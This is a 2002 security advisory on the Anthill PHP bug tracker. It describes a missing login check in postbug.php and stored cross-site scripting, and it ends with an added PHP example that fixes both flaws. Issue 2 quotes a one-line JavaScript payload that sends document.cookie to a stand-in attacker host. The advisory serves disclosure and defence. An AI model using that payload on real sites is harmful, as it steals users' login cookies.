9th Apr 2002 [SBWID-5250]
COMMAND
Anthill login and JavaScript vulnerabilities
SYSTEMS AFFECTED
all versions
PROBLEM
Ulf Harnhammar posted the following:
\"Anthill is a bug tracking database system written in PHP. It provides
the standard bug tracking features such as: user logins, summary
reports, submitting bugs, querying bugs, various severity and status
levels. It also provides some unique features, such as a template
system, and multi-lingual support.\" (direct quote from the program\'s
project page at Freshmeat)
Anthill [http://anthill.vmlinuz.ca/] was written because the vendor
felt that Bugzilla was too complex. It is published under the terms of
the GNU General Public License. The program is used by the MandrakeSoft
Secteam, among others.
ISSUES
======
1) New bugs are entered by accessing the script enterbug.php. It POSTs
the data to the script postbug.php, which stores it in the database.
enterbug.php checks if you're logged in, but postbug.php does not.
This means that people without accounts can enter new bugs in the
system, by creating an HTML document like the ones that enterbug.php
displays (the same field names, the same action attribute) and then
simply accessing that HTML document locally.
2) Almost everywhere in the program, HTML code is stored and displayed
without any interference. This makes it easy for one user to add
JavaScript code that will be executed by another user. One of the
authentication methods supported is based on cookies. If that method is
used, a malicious user may enter a short JavaScript snippet like:
<script>self.location.href="http://www.evilsite.com/evil?"+escape(document.cookie)</script>
to steal other people's cookies with their login information.
COMMUNICATION WITH VENDOR
=========================
The vendor was contacted, first on the 16th of March, and then on the
1st of April. He realizes that these bugs affect the program's
security, but he doesn't have the time to fix them, since this is just
a hobby project that he doesn't get paid for. (Hmm.. I wonder if
Richard Stallman or Linus Torvalds ever thought that way.)
SOLUTION
No fixed version is currently available. I recommend that all
administrators use their web servers' authentication/access control
facilities in their Anthill directories to keep strangers away, or that
they simply change to some better program.
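The two issues above are a missing server-side login check on the script that writes to the database and stored markup echoed back without output encoding. The following PHP is an added example written for this page, not Anthill's code: it shows the shape of a fix for both, with the login check placed in the write handler itself and every stored field escaped at render time. The table and field names, the session key `user_id` and the in-memory SQLite store are assumptions made so the script runs stand-alone from the command line.

```php
<?php
// Added example, not Anthill's code. Table/field names, the session key and
// the SQLite store are assumptions made so the script runs stand-alone (php cli).
declare(strict_types=1);

// Issue 1: the write script must perform the same login check as the form
// script. The browser, or a hand-built HTML page, controls what is POSTed,
// so the check cannot live only in enterbug.php.
function is_logged_in(array $session): bool
{
    return isset($session['user_id']) && is_int($session['user_id']) && $session['user_id'] > 0;
}

// Issue 2: stored text is escaped when it is displayed, never trusted as markup.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened equivalent of postbug.php: returns [http status, message].
function handle_postbug(array $session, array $post, PDO $pdo): array
{
    if (!is_logged_in($session)) {
        return [403, 'login required'];          // the check the advisory says was missing
    }
    $summary     = trim((string)($post['summary'] ?? ''));
    $description = trim((string)($post['description'] ?? ''));
    if ($summary === '' || strlen($summary) > 200) {
        return [400, 'summary required, max 200 bytes'];
    }
    // Parameterised insert: the raw text is stored, encoding happens on output.
    $stmt = $pdo->prepare(
        'INSERT INTO bugs (summary, description, reporter_id) VALUES (?, ?, ?)'
    );
    $stmt->execute([$summary, $description, $session['user_id']]);
    return [201, 'bug ' . $pdo->lastInsertId() . ' created'];
}

// Equivalent of the bug display page: every stored field passes through e().
function render_bug(array $bug): string
{
    return '<h2>' . e($bug['summary']) . '</h2>' . "\n"
         . '<pre>' . e($bug['description']) . '</pre>' . "\n";
}

// --- demonstration with an in-memory database (constructed data) ---
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE bugs (id INTEGER PRIMARY KEY, summary TEXT, description TEXT, reporter_id INTEGER)');

// A POST arriving with no session, as from a form saved and submitted locally.
$forgedPost = ['summary' => 'from a hand-built form', 'description' => 'no account'];
[$code, $msg] = handle_postbug([], $forgedPost, $pdo);
echo "anonymous POST -> $code $msg\n";            // 403 login required

// A logged-in user submits text that contains a script tag.
$session = ['user_id' => 7];
$markupPost = [
    'summary'     => 'Summary with <b>markup</b>',
    'description' => '<script>alert(1)</script>',
];
[$code, $msg] = handle_postbug($session, $markupPost, $pdo);
echo "authenticated POST -> $code $msg\n";        // 201 bug 1 created

// On display the tag is shown as text (&lt;script&gt;...), not executed.
$bug = $pdo->query('SELECT summary, description FROM bugs WHERE id = 1')->fetch(PDO::FETCH_ASSOC);
echo render_bug($bug);
```

Run it with `php example.php` on a build that has `pdo_sqlite`. The point of the layout is that `is_logged_in()` and `e()` are shared helpers: every script that writes calls the first, and every template that echoes stored data calls the second, so a field added later does not silently skip either check. For the cookie-based login method the advisory mentions, marking the session cookie `HttpOnly` (via `session.cookie_httponly`) additionally keeps `document.cookie` from exposing it even if an encoding step is missed somewhere.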